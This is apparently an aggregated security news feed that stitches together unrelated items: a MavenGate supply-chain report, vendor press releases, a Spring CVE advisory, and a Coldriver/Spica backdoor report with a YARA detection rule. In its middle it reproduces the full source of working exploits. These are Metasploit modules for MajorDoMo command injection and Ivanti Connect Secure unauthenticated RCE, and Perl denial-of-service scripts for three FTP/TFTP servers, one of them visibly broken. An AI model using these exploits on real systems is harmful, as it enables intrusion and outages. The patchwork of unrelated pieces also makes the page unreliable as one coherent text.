Several public and popular libraries abandoned but still used in Java and Android applications have been found susceptible to a new software supply chain attack method called MavenGate.
"Access to projects can be hijacked through domain name purchases and since most default build configurations are vulnerable, it would be difficult or even impossible to know whether an attack was being performed

Several public and popular libraries abandoned but still used in Java and Android applications have been found susceptible to a new software supply chain attack method called MavenGate.

"Access to projects can be hijacked through domain name purchases and since most default build configurations are vulnerable, it would be difficult or even impossible to know whether an attack was being performed," Oversecured said in an analysis published last week.

Successful exploitation of these shortcomings could allow nefarious actors to hijack artifacts in dependencies and inject malicious code into the application, and worse, even compromise the build process through a malicious plugin.

The mobile security firm added that all Maven-based technologies, including Gradle, are vulnerable to the attack, and that it sent reports to more than 200 companies, including Google, Facebook, Signal, Amazon, and others.

Apache Maven is chiefly used for building and managing Java-based projects, allowing users to download and manage dependencies (which are uniquely identified by their groupIds), create documentation, and release management.

While repositories hosting such dependencies can be private or public, an attacker could target the latter to conduct supply chain poisoning attacks by leveraging abandoned libraries added to known repositories.

Specifically, it involves purchasing the expired reversed domain controlled by the owner of the dependency and obtaining access to the groupId.

"An attacker can gain access to a vulnerable groupId by asserting their rights to it via a DNS TXT record in a repository where no account managing the vulnerable groupId exists," the company said.

"If a groupId is already registered with the repository, an attacker can attempt to gain access to that groupId by contacting the repository's support team."

To test out the attack scenario, Oversecured uploaded its own test Android library (groupId: "com.oversecured"), which displays the toast message "Hello World!," to Maven Central (version 1.0), while also uploading two versions to JitPack, where version 1.0 is a replica of the same library published on Maven Central.

But version 1.1 is an edited "untrusted" copy that also has the same groupId, but which points to a GitHub repository under their control and is claimed by adding a DNS TXT record to reference the GitHub username in order to establish proof of ownership.

The attack then works by adding both Maven Central and JitPack to the dependency repository list in the Gradle build script. It's worth noting at this stage that the order of declaration determines how Gradle will check for dependencies at runtime.

"When we moved the JitPack repository above mavenCentral, version 1.0 was downloaded from JitPack," the researchers said. "Changing the library version to 1.1 resulted in using the JitPack version regardless of the position of JitPack in the repository list."

As a result, an adversary looking to corrupt the software supply chain can either target existing versions of a library by publishing a higher version or against new versions by pushing a version that's lower than that of its legitimate counterpart.

This is another form of a dependency confusion attack where an attacker publishes a rogue package to a public package repository with the same name as a package within the intended private repository.

"Most applications do not check the digital signature of dependencies, and many libraries do not even publish it," the researchers added. "If the attacker wants to remain undetected for as long as possible, it makes sense to release a new version of the library with the malicious code embedded, and wait for the developer to upgrade to it."

Of the 33,938 total domains analyzed, 6,170 (18.18%) of them were found to be vulnerable to MavenGate, enabling threat actors to hijack the dependencies and inject their own code.

Sonatype, which owns Maven Central, said the outlined attack strategy "is not feasible due to the automation in place," but noted that it has "disabled all accounts associated with expired domains and GitHub projects" as a security measure.

It further said it addressed a "regression in the public key validation" process that made it possible to upload artifacts to the repository with a non-publicly shared key. It has also announced plans to collaborate with SigStore to digitally sign the components.

"The end developer is responsible for security not only for direct dependencies, but also for transitive dependencies," Oversecured said.

"Library developers should be responsible for the dependencies they declare and also write public key hashes for their dependencies, while the end developer should be responsible only for their direct dependencies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MavenGate Attack Could Let Hackers Hijack Java and Android via Abandoned Libraries

By Owais Sultan
Deloitte Partners with Memcyco to Combat ATO and Other Online Attacks with Real-Time Digital Impersonation Protection Solutions.
This is a post from HackRead.com Read the original post: Deloitte Teams Up with Memcyco for Real-Time Digital Impersonation Protection

Under their partnership, Memcyco and Deloitte will leverage additional solutions related to integration and cooperation, such as Deloitte’s Strategic & Reputation Risk Services.

Memcyco will showcase its solutions at Deloitte’s annual Cyber iCON event, demonstrating how organizations can build effective defences to protect their customers against digital impersonation fraud 

Memcyco Inc, the real-time digital impersonation detection and prevention solution provider, and Deloitte, the leading consulting, advisory, and audit services firm, today announced their strategic partnership in the cybersecurity sector. The partnership enables Deloitte to extend this range of solutions offering customers Memcyco’s industry-leading anti-impersonation software. The solutions will be offered globally in regions such as the EMEA, LATAM, USA, and others.

Deloitte and Memcyco’s pivotal collaboration combines the former’s consulting expertise with the latter’s cutting-edge platform for detecting and preventing digital impersonation fraud in real-time.

This alliance will elevate fraud prevention to a new level, helping government organizations, enterprises, and brands protect themselves from damage and safeguard their reputations from being tarnished through attacks that use phishing sites to target their customers. 

Under their partnership, Memcyco and Deloitte will leverage additional solutions related to integration and cooperation, such as Deloitte’s Strategic & Reputation Risk Services. This multidisciplinary synergy ensures a holistic response to threats, capitalizing on each organization’s area of expertise and accumulated experience, thus offering more robust and complete solutions to clients.

Memcyco provides a platform for real-time detection, protection, and response to online impersonation attacks, whereby malicious actors use phishing, smishing, and other techniques to direct customers to fake pages that look and feel much like the real thing. These attacks trick users into giving up their data, such as login credentials and credit card information, which is subsequently used for ATO (account takeover) and other online attacks, leading to data breaches, theft of funds, and ransomware.

Unlike other solutions, Memcyco is singularly able to safeguard the “window of exposure” between when a fake website goes live and when the attacker attempts to use stolen data to access company web pages, using real-time alerts to warn users not to trust the spoofed site, as well as tracking attacker and victim activity. Addressing this window is crucial for organizations to be able to protect themselves from data breaches, financial losses, and reputational damage while protecting their customers from identity theft and financial harm. 

Memcyco also provides organizations with full insight into attacks, including a list of all victims. This data not only gives the organization improved visibility, but also helps risk engines to predict fraud more accurately, thereby significantly decreasing remediation costs.

“Memcyco is delighted to build a partnership with Deloitte due to its dedicated team, expertise, and innovation capabilities,” said Israel Mazin, CEO of Memcyco. “Our shared commitment to empowering organizations to make informed decisions about their cybersecurity strategy is at the heart of our collaboration. In the long term, this partnership will pave the way for organizations of all sizes to mitigate impersonation and brandjacking attacks and to gain more trust from their customers.” 

Memcyco will showcase its solutions at the third annual Deloitte Cyber iCON event in Spain on Jan 23, 2024. Cyber iCON allows businesses to gain first-hand knowledge about the most prevalent and sophisticated cyber threats they face today.

Attendees will be able to learn about the latest strategies and countermeasures they can employ to safeguard themselves against advanced threats via real-world, interactive scenarios.

Memcyco’s representatives will join Deloitte’s experts on stage to discuss the dangers presented by digital impersonation and to introduce businesses to their comprehensive solution for mitigating such risks. Memcyco will also participate in a joint panel discussion and presentation alongside Deloitte’s expert cybersecurity consultants. 

****About Memcyco****

Memcyco provides real-time digital impersonation detection, protection and response solutions to companies and their customers. Their real-time, agentless solutions are unique in fully safeguarding the critical “window of exposure” between when a fake site goes live and when an attacker attempts to use stolen data to access company web pages.

Memcyco alerts users who visit fake sites and gives organizations complete visibility into the attack, allowing them to take remediating actions. Led by industry veterans, Memcyco is committed to ensuring the security and digital trust of its customers – and of their customers. For more information.

****About Deloitte****

Deloitte has contributed to the development of business organizations and society during its more than 175 years of history. Faced with a constantly evolving reality, it has established itself as the advisor of reference for the transformation of large national and multinational companies using a multidisciplinary approach based on excellence, technological innovation and the continuous development of the talent of its professionals, maintaining its position as a leading professional services firm.

The organization has strengthened its position by impacting clients, communities and people through the Make an Impact that Matters initiative, which is implemented in social action programs -WorldClass-, action against climate change -WorldClimate-, and its ALL IN diversity and inclusion strategy. Globally, the firm is present in more than 150 countries, where more than 345,000 professionals work.

****Contact****

*   **Sheena Kretzmer**
*   **\[email protected\]**

Deloitte Teams Up with Memcyco for Real-Time Digital Impersonation Protection

This Metasploit module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MajorDoMo Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in MajorDoMo          versions before 0662e5e.        },        'Author' => [          'Valentin Lobstein', # Vulnerability discovery and Metasploit Module          'smcintyre-r7', # Assistance        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-50917'],          ['URL', 'https://github.com/Chocapikk/CVE-2023-50917'],          ['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'],          ['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL        ],        'DisclosureDate' => '2023-12-15',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Targets' => [['Automatic', {}]],        'Privileged' => false      )    )    register_options([      Opt::RPORT(80),      OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']),    ])  end  def execute_command(cmd)    send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'),      'method' => 'GET',      'vars_get' => {        'url' => Rex::Text.encode_base64('rtsp://'),        'debug' => '1',        'transport' => "|| $(#{cmd});"      }    )  end  def exploit    execute_command(payload.encoded)  end  def check    print_status("Checking if #{peer} can be exploited!")    res = send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'),      'method' => 'GET'    )    unless res && res.code == 200      return CheckCode::Unknown('Did not receive a response from target.')    end    unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'      return CheckCode::Safe('The target is not MajorDoMo.')    end    print_good('Target is identified as MajorDoMo instance')    sleep_time = rand(5..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    print_status("Elapsed time: #{elapsed_time} seconds.")    unless res && elapsed_time >= sleep_time      return CheckCode::Safe('Failed to test command injection.')    end    CheckCode::Vulnerable('Successfully tested command injection.')  endend

MajorDoMo Command Injection

This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',        'Description' => %q{          This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are          also vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-46805'], # The auth bypass vulnerability.          ['CVE', '2024-21887'], # The command injection vulnerability.          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']        ],        'DisclosureDate' => '2024-01-10',        'Platform' => %w[linux unix],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as root.        'Targets' => [          [            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:            # cmd/linux/http/x64/meterpreter/reverse_tcp            # cmd/linux/http/x64/shell/reverse_tcp            # cmd/linux/http/x86/shell/reverse_tcp            'Linux Command',            {              'Platform' => 'linux',              'Arch' => [ARCH_CMD]            },          ],          [            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:            # cmd/unix/python/meterpreter/reverse_tcp            # cmd/unix/reverse_bash            # cmd/unix/reverse_python            'Unix Command',            {              'Platform' => 'unix',              'Arch' => [ARCH_CMD]            },          ]        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )  end  def check    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve    # the target system version information. If this requests succeeds, the target is vulnerable.    res = send_request_cgi(      'method' => 'GET',      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'    )    return CheckCode::Unknown('Connection failed') unless res    # If the vendor mitigation has been applied, the request will return 403 Forbidden.    return CheckCode::Safe if res.code != 200    # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON    # response, this is only for display purposes, we don't need to test the version information.    json_data = res.get_json_document    name = json_data.dig('software-inventory', 'software', 'name')    version = json_data.dig('software-inventory', 'software', 'version')    build = json_data.dig('software-inventory', 'software', 'build')    # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if    # get_json_document could not parse the JSON (and will return an empty Hash).    return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?    Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")  end  def exploit    send_request_cgi(      'method' => 'POST',      'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',      'ctype' => 'application/json',      'data' => {        'type' => ";#{payload.encoded} #",        'txtGCPProject' => Rex::Text.rand_text_alpha(8),        'txtGCPSecret' => Rex::Text.rand_text_alpha(8),        'txtGCPPath' => Rex::Text.rand_text_alpha(8),        'txtGCPBucket' => Rex::Text.rand_text_alpha(8)      }.to_json    )  endend

Ivanti Connect Secure Unauthenticated Remote Code Execution

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.

Specifically, an application is vulnerable when all of the following are true:

  *  the application uses Spring MVC
  *  Spring Security 6.1.6+ or 6.2.1+ is on the classpath


Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.




1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-22233

**Spring Framework server Web DoS Vulnerability**

High severity GitHub Reviewed Published Jan 22, 2024 to the GitHub Advisory Database • Updated Jan 23, 2024

**Package**

maven org.springframework:spring-core (Maven)

**Affected versions**

\>= 6.1.0, < 6.1.2

< 6.0.15

**Patched versions**

6.1.2

6.0.15

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.

Specifically, an application is vulnerable when all of the following are true:

*   the application uses Spring MVC
*   Spring Security 6.1.6+ or 6.2.1+ is on the classpath

Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-22233
*   https://spring.io/security/cve-2024-22233/

Published to the GitHub Advisory Database

Jan 22, 2024

Last updated

Jan 23, 2024

GHSA-r4q3-7g4q-x89m: Spring Framework server Web DoS Vulnerability

EzServer version 6.4.017 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: EzServer 6.4.017 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 22 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: EzServer 6.4.017 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x10698;

    my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n";  
    $sock->send($payload);  
    $sock->close();

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] EzServer 6.4.017 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

EzServer 6.4.017 Denial Of Service

Golden FTP Server version 2.02b remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 21 january 2024# Vendor Homepage:  N/A# Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing# Notification vendor: No reported# Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";$s->send("USER anon\r\n");my $response = <$s>;print $response;$s->send("PASS anon\r\n");$response = <$s>;print $response;$s->send("SYST\r\n");$response = <$s>;print $response;sleep(2);$s->send("PASV " . "\x41"x6631 . "\r\n");sleep(3);$response = <$s>;print $response;$response = <$s>;print $response;print ">>> Sending second payload\n";$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");$response = <$s>;print $response;sleep(2);    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] Golden FTP Server 2.02b - Denied of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

Golden FTP Server 2.02b Denial Of Service

ProSysInfo TFTP Server TFTPDWIN version 0.4.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 20 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The TFTP server does not correctly handle the amount of data or bytes sent..  
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x520;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $tftp_server,  
    PeerPort => 69,  
    Proto    => 'udp'  
) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;

    print $ftp_socket $buffer;

    close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#     ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service

Russian state-sponsored actor Coldriver uses spear phishing attacks to install the Spica backdoor on victim systems.

Researchers at Google’s Threat Analysis Group (TAG) have published their findings about a group they have dubbed Coldriver. The main targets of the Coldriver group are high-profile individuals in non-governmental organizations (NGOs), former intelligence and military officials, and NATO governments. These targets are approached in spear phishing attacks.

The group uses social engineering techniques to persuade their targets to open documents or download malware. Their activities are aligned with those of the Russian government, so it’s pretty safe to say that Coldriver is a state-sponsored group.

In December 2023, the US charged two Russians believed to be members of this group, for their role in a campaign that hacked government accounts.

Microsoft, who tracks the group as Star Blizzard, says the group targets individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests.

Typically, the group creates an impersonation account that pretends to be an expert in a field the target might be interested in or that is somehow affiliated with the target. Once a relationship has been established, the target will receive a phishing link or a document containing such a link.

To gain trust, Coldriver uses social media and professional marketing systems to build a profile of its target. With that information the group sets up email contacts, social media and other networking accounts that align with the target’s interests and appear legitimate.

Coldriver uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton Mail in the initial approach, impersonating known contacts of the target or well-known names in the target’s field of interest or sector. The group is also known to register malicious domains that mimic legitimate organizations.

Recently, TAG has noticed that the group uses “lure documents” to install a backdoor on the target’s system. These lure documents, which are harmless PDF files, are sent to the target, but when they open them the content appears to be encrypted.

When the target queries about the encryption, Coldriver sends the target a link to a decryption utility, typically hosted on a cloud storage site. This so-called decryption utility shows the target a normal PDF file, so that it appears as if the original was decrypted, but at the same time it installs a backdoor.

This backdoor is custom malware, likely developed by or for Coldriver, called Spica. Spica is written in the Rust programming language and supports, among others, these commands:

*   Execute arbitrary shell commands
*   Steal cookies from Chrome, Firefox, Opera, and Edge
*   Upload and download files
*   Analyze the filesystem by listing the content
*   Enumerate documents and copy them to an archive

The backdoor establishes persistence through an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.

TAG suspects but has been unable to verify that there are multiple variants of Spica: one to match each lure document sent to targets.

**YARA rule**

YARA is a tool that can identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.

TAG has created a YARA rule that cab help find the Spica backdoor.

rule SPICA\_\_Strings {  
meta:

author = “Google TAG”  
description = “Rust backdoor using websockets for c2 and embedded decoy PDF”  
hash = “37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9”  
strings:  
$s1 = “os\_win.c:%d: (%lu) %s(%s) – %s”  
$s2 = “winWrite1”  
$s3 = “winWrite2”  
$s4 = “DNS resolution panicked”  
$s5 = “struct Dox”  
$s6 = “struct Telegram”  
$s8 = “struct Download”  
$s9 = “spica”  
$s10 = “Failed to open the subkey after setting the value.”  
$s11 = “Card Holder: Bull Gayts”  
$s12 = “Card Number: 7/ 3310 0195 4865”  
$s13 = “CVV: 592”  
$s14 = “Card Expired: 03/28”

$a0 = “agent\\\\src\\\\archive.rs”  
$a1 = “agent\\\\src\\\\main.rs”  
$a2 = “agent\\\\src\\\\utils.rs”  
$a3 = “agent\\\\src\\\\command\\\\dox.rs”  
$a4 = “agent\\\\src\\\\command\\\\shell.rs”  
$a5 = “agent\\\\src\\\\command\\\\telegram.rs”  
$a6 = “agent\\\\src\\\\command\\\\mod.rs”  
$a7 = “agent\\\\src\\\\command\\\\mod.rs”  
$a8 = “agent\\\\src\\\\command\\\\cookie\\\\mod.rs”  
$a9 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\mod.rs”  
$a10 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\browser\_name.rs”  
condition:  
7 of ($s\*) or 5 of ($a\*)  
}

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Coldriver threat group targets high-ranking officials to obtain credentials 

By Owais Sultan
Finclusive, Verida and cheqd Launch Pioneering Solution For Reusable And Verifiable KYC/KYB Credentials.
This is a post from HackRead.com Read the original post: Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

KYC/KYB compliance technology provider FinClusive said today it’s partnering with Verida and cheqd to launch an end-to-end platform for the creation and issuance of reusable and verifiable credentials that can be checked in real-time without impacting the privacy of clients. The partners say it’s a key innovation that promises to streamline client onboarding in both traditional finance and the nascent Web3 industry. 

What they’re offering is a plug-and-play platform that can handle the KYC/KYB requirements of any financial services organization, and generate verifiable credentials that are reusable and portable, with full client privacy and embedded compliance. 

The partnership builds on an earlier proof-of-concept demonstrated by FinClusive and Verida, which provides a mobile wallet for storing verifiable credentials. With the addition of cheqd into the mix, FinClusive said it can now offer the essential network infrastructure for Web3 companies to issue and verify credentials in seconds. 

With their new solution, the companies are looking to tackle some of the most significant headaches faced by organizations in the traditional customer onboarding and verification process, which is both expensive and time-consuming. Issuing digital credentials that can be reused, helps to eliminate the high costs associated with KYC/KYB. Moreover, with its instantaneous check feature for AML assistance, risk scoring and other background screenings, the solution makes it simpler than ever to meet compliance requirements. Finally, by integrating real-time and verifiable data sharing into the solution, the companies say they can provide maximum assurance for businesses, without requiring them to perform any manual checks. 

By addressing these headaches, Finclusive says it’s bringing significant value to businesses, reducing their operating costs and improving the efficiency of their screening processes. 

**Streamlined Customer Onboarding**

Each of the partners brings its strengths to the table, offering a variety of capabilities that are needed to create a regulatory-compliant process for verifying and sharing KYC credentials. FinClusive handles the initial identity verification checks with support for more than 170 countries, while cheqd’s Credential Service enables verifiable digital credentials to be issued, based on the results of those checks, and shared with other parties. As for Verida, it provides a decentralized wallet infrastructure for businesses and individuals to cryptographically store their KYC/KYB credentials inside a secure Verida Vault.

As the companies explained, the biggest advantage for businesses and individuals is that they will only ever have to undergo KYC/KYB once, and then use their verified credentials to access any application or service without constantly repeating that process. However, the solution goes further than similar offerings, leveraging FinClusive’s compliance tech and cheqd’s infrastructure platform to provide instant lookups for AML screenings and other background checks, meaning that the credentials can be verified, issued, managed, shared and revoked at any time. 

The beauty of this platform is that customers can maintain self-sovereign control of their KYC/KYB data, in keeping with regulations such as Europe’s existing GDPR and upcoming eIDAS, and the U.S. CCPA standard. Previously, where KYC/KYB data would have to be shared with multiple financial services providers, this information remains private yet fully verifiable. In this way, the partners are creating a more efficient market for identity verification while eliminating the need to replicate and store sensitive information. 

**Real-Time Monitoring **

Uniquely, FinClusive and its partners can facilitate enhanced and ongoing KYC/KYB processes beyond the initial onboarding stage. In some financial markets, service providers have additional obligations such as ongoing client monitoring, dynamic risk scoring and continuous AML screening checks. Using FinClusive’s tools, the solution can automate real-time client monitoring processes within an easy-to-use dashboard, while also enabling the simultaneous verification and live “double-check” of KYC/KYB data. 

**Disrupting Regulated Industries**

The companies cite several obvious use cases for their new solution, such as onboarding at any bank or nonbank financial service, plus any virtual asset service provider, at low cost and with more streamlined efficiency. The solution will also support KYC/KYB for eCommerce and online retailers, access to age-restricted content, government services and cross-border transactions. Finally, it also paves the way for KYC/KYB data to be paired with educational, employment, loyalty and health credentials to build higher levels of assurance and reinforce digital identities and reputations. 

Following today’s announcement, the companies say they’re expecting to roll out the first verifiable credentials for KYC/KYB within the first quarter of this year, kick-starting a revolution that will modernize client onboarding and monitoring across both traditional finance and the Web3 industry. 

Alex Tweeddale, a product lead at cheqd, said the collaboration is extremely innovative, paving the way for real-time monitoring and verification in a fully decentralized and private manner. “This is completely new to the market and enables us to provide a fully regulatory-compliant solution for customer onboarding and monitoring, while simultaneously being future-proofed for the new eIDAS 2.0 regulation for digital credentials,” he said. “This can revolutionize the existing paradigm for customer data sharing, reducing costs and friction within existing regulated industries and emerging markets where identity verification is currently too costly.”

Tag

#git